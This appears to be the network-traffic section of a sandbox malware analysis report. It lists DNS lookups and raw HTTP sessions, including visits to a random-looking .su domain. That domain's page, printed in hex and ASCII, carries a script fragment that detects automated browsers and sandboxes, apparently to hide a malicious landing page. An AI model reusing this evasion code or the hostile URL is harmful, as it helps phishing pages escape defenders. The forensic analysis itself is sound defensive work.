                                                          Jan 24, 2024 15:33:59.199109077 CET5959053192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:59.316620111 CET53500841.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:59.317934036 CET53595901.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:00.609100103 CET5451053192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:34:00.609685898 CET5351353192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:34:00.728029013 CET53545101.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:00.728250027 CET53535131.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:10.607974052 CET53517861.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:27.141249895 CET5122553192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:34:27.141752005 CET5886553192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:34:27.262995958 CET53588651.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:27.377966881 CET53512251.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:29.420666933 CET53619031.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:31.252846956 CET53631711.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:51.875312090 CET53633811.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:52.555830956 CET53500111.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:55.476567984 CET5488353192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:34:55.477058887 CET5758353192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:34:55.595562935 CET53548831.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:34:55.595613956 CET53575831.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:35:20.119038105 CET6329553192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:35:20.119154930 CET4940653192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:35:20.237603903 CET53632951.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:35:20.237632036 CET53494061.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:35:20.799046040 CET53544651.1.1.1192.168.2.6
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 24, 2024 15:33:52.702682972 CET192.168.2.61.1.1.10x6168Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.702961922 CET192.168.2.61.1.1.10xa7cStandard query (0)clients2.google.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.703563929 CET192.168.2.61.1.1.10xefccStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.703803062 CET192.168.2.61.1.1.10x726Standard query (0)accounts.google.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:54.602844000 CET192.168.2.61.1.1.10xf2a2Standard query (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.suA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:54.603193045 CET192.168.2.61.1.1.10xcbf7Standard query (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su65IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.081036091 CET192.168.2.61.1.1.10x3d0eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.081358910 CET192.168.2.61.1.1.10xb309Standard query (0)www.google.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.129472971 CET192.168.2.61.1.1.10xd11dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.130835056 CET192.168.2.61.1.1.10x8503Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.139441013 CET192.168.2.61.1.1.10xd3a9Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.140624046 CET192.168.2.61.1.1.10x34e5Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                          Jan 24, 2024 15:33:57.672630072 CET192.168.2.61.1.1.10xa845Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:57.674168110 CET192.168.2.61.1.1.10xcfcStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:59.197941065 CET192.168.2.61.1.1.10x6190Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:59.199109077 CET192.168.2.61.1.1.10x24bcStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:34:00.609100103 CET192.168.2.61.1.1.10x6792Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:00.609685898 CET192.168.2.61.1.1.10x193fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:34:27.141249895 CET192.168.2.61.1.1.10x3f14Standard query (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.suA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:27.141752005 CET192.168.2.61.1.1.10xaa37Standard query (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su65IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.476567984 CET192.168.2.61.1.1.10x507Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.477058887 CET192.168.2.61.1.1.10x69afStandard query (0)www.google.com65IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.119038105 CET192.168.2.61.1.1.10x65a8Standard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.119154930 CET192.168.2.61.1.1.10xdcdStandard query (0)clients1.google.com65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients.l.google.com142.250.105.139A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients.l.google.com142.250.105.138A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients.l.google.com142.250.105.101A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients.l.google.com142.250.105.102A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients.l.google.com142.250.105.100A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821361065 CET1.1.1.1192.168.2.60x6168No error (0)clients.l.google.com142.250.105.113A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.821383953 CET1.1.1.1192.168.2.60xa7cNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 24, 2024 15:33:52.822113991 CET1.1.1.1192.168.2.60xefccNo error (0)accounts.google.com142.250.105.84A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:54.724608898 CET1.1.1.1192.168.2.60xcbf7No error (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su65IN (0x0001)false
                                                          Jan 24, 2024 15:33:54.975277901 CET1.1.1.1192.168.2.60xf2a2No error (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su172.67.199.173A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:54.975277901 CET1.1.1.1192.168.2.60xf2a2No error (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su104.21.21.179A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199923992 CET1.1.1.1192.168.2.60xb309No error (0)www.google.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199945927 CET1.1.1.1192.168.2.60x3d0eNo error (0)www.google.com142.250.105.104A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199945927 CET1.1.1.1192.168.2.60x3d0eNo error (0)www.google.com142.250.105.99A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199945927 CET1.1.1.1192.168.2.60x3d0eNo error (0)www.google.com142.250.105.103A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199945927 CET1.1.1.1192.168.2.60x3d0eNo error (0)www.google.com142.250.105.106A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199945927 CET1.1.1.1192.168.2.60x3d0eNo error (0)www.google.com142.250.105.105A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:55.199945927 CET1.1.1.1192.168.2.60x3d0eNo error (0)www.google.com142.250.105.147A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.248174906 CET1.1.1.1192.168.2.60xd11dNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.248174906 CET1.1.1.1192.168.2.60xd11dNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.250029087 CET1.1.1.1192.168.2.60x8503No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.257781982 CET1.1.1.1192.168.2.60xd3a9No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.257781982 CET1.1.1.1192.168.2.60xd3a9No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.257781982 CET1.1.1.1192.168.2.60xd3a9No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.257781982 CET1.1.1.1192.168.2.60xd3a9No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.257781982 CET1.1.1.1192.168.2.60xd3a9No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:56.258923054 CET1.1.1.1192.168.2.60x34e5No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 24, 2024 15:33:57.791496038 CET1.1.1.1192.168.2.60xa845No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:57.791496038 CET1.1.1.1192.168.2.60xa845No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:57.793143988 CET1.1.1.1192.168.2.60xcfcNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:33:59.316620111 CET1.1.1.1192.168.2.60x6190No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:59.316620111 CET1.1.1.1192.168.2.60x6190No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:33:59.317934036 CET1.1.1.1192.168.2.60x24bcNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 24, 2024 15:34:00.728029013 CET1.1.1.1192.168.2.60x6792No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:27.262995958 CET1.1.1.1192.168.2.60xaa37No error (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su65IN (0x0001)false
                                                          Jan 24, 2024 15:34:27.377966881 CET1.1.1.1192.168.2.60x3f14No error (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su104.21.21.179A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:27.377966881 CET1.1.1.1192.168.2.60x3f14No error (0)iajjfhkbqnkrnryejn.ypiqzxx7wocs.su172.67.199.173A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595562935 CET1.1.1.1192.168.2.60x507No error (0)www.google.com142.250.105.104A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595562935 CET1.1.1.1192.168.2.60x507No error (0)www.google.com142.250.105.103A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595562935 CET1.1.1.1192.168.2.60x507No error (0)www.google.com142.250.105.147A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595562935 CET1.1.1.1192.168.2.60x507No error (0)www.google.com142.250.105.99A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595562935 CET1.1.1.1192.168.2.60x507No error (0)www.google.com142.250.105.106A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595562935 CET1.1.1.1192.168.2.60x507No error (0)www.google.com142.250.105.105A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:34:55.595613956 CET1.1.1.1192.168.2.60x69afNo error (0)www.google.com65IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients.l.google.com172.253.124.101A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients.l.google.com172.253.124.100A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients.l.google.com172.253.124.102A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients.l.google.com172.253.124.113A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients.l.google.com172.253.124.139A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237603903 CET1.1.1.1192.168.2.60x65a8No error (0)clients.l.google.com172.253.124.138A (IP address)IN (0x0001)false
                                                          Jan 24, 2024 15:35:20.237632036 CET1.1.1.1192.168.2.60xdcdNo error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          • clients2.google.com
                                                          • accounts.google.com
                                                          • iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          • https:
                                                            • challenges.cloudflare.com
                                                            • cdn.jsdelivr.net
                                                          • fs.microsoft.com
                                                          • a.nel.cloudflare.com
                                                          • clients1.google.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649715142.250.105.1394432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:53 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                          Host: clients2.google.com
                                                          Connection: keep-alive
                                                          X-Goog-Update-Interactivity: fg
                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                          X-Goog-Update-Updater: chromecrx-117.0.5938.134
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: empty
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:53 UTC732INHTTP/1.1 200 OK
                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-IkmkJj0NuI-kU_9kKKUAEQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Wed, 24 Jan 2024 14:33:53 GMT
                                                          Content-Type: text/xml; charset=UTF-8
                                                          X-Daynum: 6232
                                                          X-Daystart: 23633
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: GSE
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2024-01-24 14:33:53 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 33 32 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 33 36 33 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6232" elapsed_seconds="23633"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                          2024-01-24 14:33:53 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                          Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                          2024-01-24 14:33:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.649716142.250.105.844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:53 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                          Host: accounts.google.com
                                                          Connection: keep-alive
                                                          Content-Length: 1
                                                          Origin: https://www.google.com
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: empty
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
                                                          2024-01-24 14:33:53 UTC1OUTData Raw: 20
                                                          Data Ascii:
                                                          2024-01-24 14:33:53 UTC1627INHTTP/1.1 200 OK
                                                          Content-Type: application/json; charset=utf-8
                                                          Access-Control-Allow-Origin: https://www.google.com
                                                          Access-Control-Allow-Credentials: true
                                                          X-Content-Type-Options: nosniff
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Wed, 24 Jan 2024 14:33:53 GMT
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-srkCn5USClorEk3pYmHSxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          X-XSS-Protection: 0
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2024-01-24 14:33:53 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                          Data Ascii: 11["gaia.l.a.r",[]]
                                                          2024-01-24 14:33:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.649720172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:55 UTC686OUTGET /Ad89NLTS/ HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:56 UTC789INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:33:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          set-cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn; path=/
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=otii7iBVI66%2FgV1i5M360xwjJs61f1wxWU7DhBzzakY18BPe3GWfJmPwUIw8d1xgGIHszlRl7PM2FdyKsdEvprISo75a8wgLrs9f5D1%2Fvs%2BD72a7OyOtRtflO%2Fa5gduIyKVqVJ3IzMypRzg3dlFvqUVezFuv"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fe897f88507e-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:56 UTC580INData Raw: 63 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 49 53 6e 76 48 69 56 47 5a 78 45 41 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6c 61 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a
                                                          Data Ascii: c45<!DOCTYPE html><html lang="en"><head><title>ISnvHiVGZxEA</title><meta charset="UTF-8"><meta name="lang" content="en"><meta name="viewport" content="width=device-width, initial-scale=1"><script src="https://challenges.cloudflare.com/turnstile/v0/api.j
                                                          2024-01-24 14:33:56 UTC1369INData Raw: 4e 61 74 69 76 65 20 43 6c 69 65 6e 74 22 29 29 20 7c 7c 20 21 30 20 3d 3d 3d 20 6e 61 76 69 67 61 74 6f 72 2e 77 65 62 64 72 69 76 65 72 20 7c 7c 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 77 65 62 64 72 69 76 65 72 22 29 20 7c 7c 20 77 69 6e 64 6f 77 2e 63 61 6c 6c 50 68 61 6e 74 6f 6d 20 7c 7c 20 77 69 6e 64 6f 77 2e 5f 70 68 61 6e 74 6f 6d 20 7c 7c 20 28 77 69 6e 64 6f 77 2e 63 68 72 6f 6d 65 20 26 26 20 77 69 6e 64 6f 77 2e 63 68 72 6f 6d 65 2e 77 65 62 73 74 6f 72 65 29 20 7c 7c 20 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 20 26 26 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 2e
                                                          Data Ascii: Native Client")) || !0 === navigator.webdriver || window.document.documentElement.getAttribute("webdriver") || window.callPhantom || window._phantom || (window.chrome && window.chrome.webstore) || (window.navigator.languages && window.navigator.languages.
